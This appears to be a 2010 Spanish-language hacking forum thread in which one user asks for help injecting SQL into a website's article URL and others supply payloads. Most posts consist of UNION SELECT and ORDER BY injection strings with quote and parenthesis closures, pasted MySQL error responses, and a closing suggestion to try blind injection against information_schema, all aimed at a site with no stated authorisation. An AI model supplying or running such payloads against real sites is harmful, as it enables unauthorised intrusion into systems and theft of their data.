Tema destacado: Recuperar cuenta de Google, GMail, Youtube
 Autor
|
Tema: Problema al hacer una SQLi (Leído 3,551 veces)
|
Debci
Wiki
 Desconectado
Mensajes: 1.945
Actualizate o muere!
|
Hola muy buenas a todos, probando una SQLi he encontrado lo que parece ser un posible vector de ataque: http://www.mipagina.com/articulo/'1 CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1Se supone que asi es vulnerable no? Pero cuando intento hacer la injeción con esto: -1+union+select+1,2,3,n-- (Con n me refiero a que voy subiendo de tablas) Al insertar el -1 se va el error y no aparece ninguna tabla tras probar hasta 20 (no creo que haya mas, sinceramente). Es vulnerable o simplemente no la estoy atacando bien? Saludos |
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 466
|
prueba con
-1') union all select 1,2,3,4,n--
|
|
|
|
|
En línea
|
|
|
|
Debci
Wiki
Desconectado
Mensajes: 1.945
Actualizate o muere!
|
prueba con
-1') union all select 1,2,3,4,n--
Bad response :/ CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1Gracias por tu ayuda  Saludos
|
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 466
|
es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con ') ... pueds probar a hacer: -1') union all select 1,2,3,4,'n fijate que la n lleva la comilla antes! en fin, prueba y postea! |
|
|
|
|
En línea
|
|
|
|
Debci
Wiki
Desconectado
Mensajes: 1.945
Actualizate o muere!
|
es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con ') ... pueds probar a hacer: -1') union all select 1,2,3,4,'n fijate que la n lleva la comilla antes! en fin, prueba y postea! Mira, si hago esto: -1')+union+all+select+1,2,3,4,'5-- Me devuelve: CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1Sin embargo si pruebo con: -1')+union+all+select+1,2,3,'4,'5-- Da esto: CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5--')' at line 1Por lo que sospecho que las comillas no estan situadas como me parecia :S Saludos
|
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 466
|
vale, prueba con: -1')+union+all+select+1,2,3,4,('5-- (fijate en el parentesis) sino, intenta realizar la consulta sin comentar el final de ella |
|
|
|
|
En línea
|
|
|
|
|
|
Debci
Wiki
Desconectado
Mensajes: 1.945
Actualizate o muere!
|
He conseguido que con eso me devuelva: CMS_GetContentIDByName: Unknown column '87' in 'order clause' Por lo que hay mas tablas de las que sospechaba!ES este codigo el que he usado: -1')+and+1=1+order+by+87+--+ Y con dos comillas suelta esto: CMS_GetContentIDByName: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''') OR (url_rewrite = ''1''') LIMIT 1' at line 1Codigo usado: '1'' Saludos
|
|
|
|
« Última modificación: 2 Septiembre 2010, 09:42 por Debci »
|
En línea
|
|
|
|
|
|
Debci
Wiki
Desconectado
Mensajes: 1.945
Actualizate o muere!
|
-1+union+select+1,2,3,n; -- Ni siquiera me devuelve un error :S Saludos
|
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 466
|
vaya hueso duro de roer... deberías partir de la base de que la query original debes cerrarla con: ') y terminarla con: (' es que parece que el "comentado" no te lo tiene en cuenta, verdad? no se... yo no se que más decirte! xD si se pasa alguien que sepa más pues que arroje luz al asunto, mientras tanto, suerte! xD |
|
|
|
|
En línea
|
|
|
|
OzX
Desconectado
Mensajes: 397
[NuKe] Team
|
-1')+and+1=1+order+by+87+--+
si te tira ese erro q mencinoas ahi tenes tu sqli estable
nada mas anda provando
-1')+and+1=1+order+by+15+--+
-1')+and+1=1+order+by+10+--+
hasta que no te tire error
luego cambia el 1=1 por 1=0 y tendras tu SQLI estable.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
raul338
 Conectado
Mensajes: 2.371
La sonrisa es la mejor forma de afrontar las cosas
|
-1+union+select+1,2,3,n; -- Ni siquiera me devuelve un error :S Saludos No crees que es buena señal eso? No se pueden ver los resultados de la query ?
|
|
|
|
|
En línea
|
|
|
|
Debci
Wiki
Desconectado
Mensajes: 1.945
Actualizate o muere!
|
-1+union+select+1,2,3,n; -- Ni siquiera me devuelve un error :S Saludos No crees que es buena señal eso? No se pueden ver los resultados de la query ? No, no devuelve ningun numero para añadir una consulta o funcion sql. Saludos
|
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 466
|
intenta con blind injection, si la consulta no te tira un error se entiene que está bien formada, prueba con lo tipico de count (*) y mira a ver si hay information_schema
|
|
|
|
|
En línea
|
|
|
|
|
 |
